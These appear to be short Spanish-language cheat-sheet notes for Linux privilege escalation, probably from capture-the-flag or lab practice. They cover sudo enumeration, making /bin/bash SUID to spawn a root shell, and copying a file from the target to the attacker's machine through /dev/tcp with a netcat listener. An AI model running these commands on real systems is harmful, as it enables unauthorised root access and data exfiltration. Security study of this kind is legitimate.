.

::: sudo -l					"lista los programas que podemos ejecutar como superUsuario... <3 <3 <3"
 :: sudo -u root python3.8 /path/progra/here.py					"...<3 <3 <3"

  ::: sudo -u user_test whoami

						output::>  user_test

::: chmod u+s /bin/bash   &&   bash -p     "ejecuta bash como el usuario propietario, en este caso root"



*** recibir codigo de targed a vim local... <3 <3 <3

	ipTarged::: cat /path/file/test.py > /dev/tcp/ip_local_vpn/port_443

	::: nc -nlvp 443 | vim -					"vim va a recibir el codigo para analizar mejor en local... <3 <3 <3"
